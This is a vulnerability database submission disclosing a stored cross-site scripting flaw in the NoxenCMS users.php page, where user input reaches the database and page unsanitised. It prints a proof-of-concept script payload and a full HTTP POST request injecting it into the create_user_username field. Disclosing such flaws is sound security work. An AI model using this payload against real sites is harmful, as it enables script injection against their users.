| Title | NoxenCMS XSS vulnerability exists |
|---|
| Description | Vulnerability Title: storage XSS
Software link: https://github.com/ConsoleTVs/Noxen
Setup environment: windo10-php5.6.27
1. Vulnerability analysis
The vulnerability lies in users In PHP, when receiving the parameters input by the user, it is directly inserted into the database without judging whether the string input by the user is legal.
Then query the data from the database and display it on the page.
1. Vulnerability utilization
“><script>alert(/xss/)</script>
POC:
POST /Noxen-master/users.php HTTP/1.1
Host: x.x.x.x
Content-Length: 213
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36 Edg/103.0.1264.71
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://x.x.x.x/Noxen-master/users.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: td_cookie=4107653369; PHPSESSID=dbs82c77msp8t6cjq2vlv4gia4
Connection: close
fakeusernameremembered=&create_user_username=%22%3E%3Cscript%3Ealert%28%2Fxss%2F%29%3C%2Fscript%3E&fakepasswordremembered=&create_user_password=123456&create_user_email=123%40qq.com&create_user_type=1&create_user=
|
|---|
| Source | ⚠️ https://github.com/whiex/Noxen |
|---|
| User | s7eyd7 (UID 30723) |
|---|
| Submission | 08/22/2022 10:15 (4 years ago) |
|---|
| Moderation | 08/23/2022 10:34 (1 day later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 207000 [ConsoleTVs Noxen /Noxen-master/users.php create_user_username cross site scripting] |
|---|
| Points | 20 |
|---|